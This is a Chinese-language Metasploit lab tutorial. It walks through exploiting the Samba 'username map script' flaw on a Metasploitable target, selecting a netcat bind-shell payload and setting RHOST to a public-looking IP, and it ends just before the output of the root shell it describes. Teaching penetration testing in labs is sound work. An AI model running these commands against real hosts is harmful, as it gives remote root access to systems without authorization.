#启动MSF终端的命令如下所示:
root@kali:~# msfconsole #启动 ../ MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMM MMMN$ vMMMM MMMNl MMMMM MMMMM JMMMM MMMNl MMMMMMMN NMMMMMMM JMMMM MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMNM MMMMMMM MMMMM jMMMM MMMNI WMMMM MMMMMMM MMMM# JMMMM MMMMR ?MMNM MMMMM .dMMMM MMMMNm `?MMM MMMM` dMMMMM MMMMMMN ?MM MM? NMMMMMN MMMMMMMMNe JMMMMMNMMM MMMMMMMMMMNm, eMMMMMNMMNMM MMMMNNMNMMMMMNx MMMMMMNMMNMMNM MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM https://metasploit.com =[ metasploit v4.16.30-dev ] + -- --=[ 1722 exploits - 986 auxiliary - 300 post ] + -- --=[ 507 payloads - 40 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf >#help命令列出MSF终端所支持的命令列表help[ ] 对于其中的大部分命令,你可以输入help[COMMAND],进一步查看该命令的使用帮助信息。对于查找模块的search命令希望了解如何使用,就可以在MSF终端中输入help search,MSF终端将会显示该命令的参数列表,包括每个参数的含义及可能的取值。
msf > help search Usage: search [keywords] Keywords: app : Modules that are client or server attacks author : Modules written by this author bid : Modules with a matching Bugtraq ID cve : Modules with a matching CVE ID edb : Modules with a matching Exploit-DB ID name : Modules with a matching descriptive name platform : Modules affecting this platform ref : Modules with a matching ref type : Modules of a specific type (exploit, auxiliary, or post) Examples: search cve:2009 type:exploit app:client我们仍然针对Linux Metasploitable靶机环境中存在的Samba服务漏洞进行渗透攻击测试,首先使用search命令从Metasploit目前庞大的渗透代码库中找出攻击Samba服务的模块,如下所示,结果中列出一系列的辅助模块与渗透攻击模块,从中找到针对usermap_script安全漏洞的渗透攻击模块名称为multi/samba/usermap_script。
msf > search samba Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow auxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflow auxiliary/scanner/rsync/modules_list normal List Rsync Modules auxiliary/scanner/smb/smb_uninit_cred normal Samba _netr_ServerPasswordSet Uninitialized Credential State exploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86) exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86) exploit/linux/samba/is_known_pipename 2017-03-24 excellent Samba is_known_pipename() Arbitrary Module Load exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflow exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Samba SetInformationPolicy AuditEventsInfo Heap Overflow exploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86) exploit/multi/samba/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow exploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Execution exploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow exploit/osx/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Mac OS X PPC) exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow exploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC) exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Execution exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent MS14-060 Microsoft Windows OLE Package Manager Code Execution exploit/windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflow exploit/windows/license/calicclnt_getconfig 2005-03-02 average Computer Associates License Client GETCONFIG Overflow exploit/windows/smb/group_policy_startup 2015-01-26 manual Group Policy Script Execution From Shared Resource post/linux/gather/enum_configs normal Linux Gather Configurations接下来运行“use multi/samba/usermap_script”命令选择这个渗透攻击模块,并通过“show payloads”查看与该渗透攻击模块相兼容的攻击载荷,执行“set payload cmd/unix/bind_netcat”选择bind_netcat,即使用netcat工具在渗透攻击成功后执行Shell,并通过netcat绑定在一个监听端口上。在选择完最核心的渗透攻击与攻击载荷模块之后,执行***“show options***”来查看需要设置哪些配置参数,结果显示我们只需要设置RHOST为攻击目标靶机IP地址,而RPORT目标端口、LPORT攻击载荷监听端口,以及target目标系统类型都可以使用默认值即可,至此已经准备好了渗透攻击环境,正所谓“万事俱备,只等号令”了。具体操作命令如下:
msf > use exploit/multi/samba/usermap_script #使用渗透攻击的模块 msf exploit(multi/samba/usermap_script) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- cmd/unix/bind_awk normal Unix Command Shell, Bind TCP (via AWK) cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd) cmd/unix/bind_lua normal Unix Command Shell, Bind TCP (via Lua) cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat) cmd/unix/bind_netcat_gaping normal Unix Command Shell, Bind TCP (via netcat -e) cmd/unix/bind_netcat_gaping_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6 cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl) cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6 cmd/unix/bind_r normal Unix Command Shell, Bind TCP (via R) cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby) cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6 cmd/unix/bind_zsh normal Unix Command Shell, Bind TCP (via Zsh) cmd/unix/generic normal Unix Command, Generic Command Execution cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet) cmd/unix/reverse_awk normal Unix Command Shell, Reverse TCP (via AWK) cmd/unix/reverse_lua normal Unix Command Shell, Reverse TCP (via Lua) cmd/unix/reverse_ncat_ssl normal Unix Command Shell, Reverse TCP (via ncat) cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat) cmd/unix/reverse_netcat_gaping normal Unix Command Shell, Reverse TCP (via netcat -e) cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl) cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl) cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl) cmd/unix/reverse_php_ssl normal Unix Command Shell, Reverse TCP SSL (via php) cmd/unix/reverse_python normal Unix Command Shell, Reverse TCP (via Python) cmd/unix/reverse_python_ssl normal Unix Command Shell, Reverse TCP SSL (via python) cmd/unix/reverse_r normal Unix Command Shell, Reverse TCP (via R) cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby) cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby) cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet) cmd/unix/reverse_zsh normal Unix Command Shell, Reverse TCP (via Zsh) msf exploit(multi/samba/usermap_script) > show options Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target port (TCP) Exploit target: Id Name -- ---- 0 Automatic msf exploit(multi/samba/usermap_script) > set payload cmd/unix/bind_netcat ***#攻击载荷模块*** payload => cmd/unix/bind_netcat msf exploit(multi/samba/usermap_script) > show options Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target port (TCP) Payload options (cmd/unix/bind_netcat): Name Current Setting Required Description ---- --------------- -------- ----------- LPORT 4444 yes The listen port RHOST no The target address Exploit target: Id Name -- ---- 0 Automatic msf exploit(multi/samba/usermap_script) > set RHOST 61.167.199.253 RHOST => 61.167.199.253 ***#设置RHOST为攻击目标靶机IP地址***在MSF终端中实施渗透攻击的号令非常简单,只需要输入“exploit”命令就会马上启动,当你刚刚敲完回车的同时,你已经在MSF终端里看到了“command shell session 1 opened”的成功信息,这时可以在下面输入一些Shell命令,如uname-a和whoami,来查看你所控制的目标主机操作系统类型,以及你所拥有的用户账户权限。恭喜你!通过输入几个简单的命令,你已经获得了Metasploitable靶机的根用户权限。具体如下:
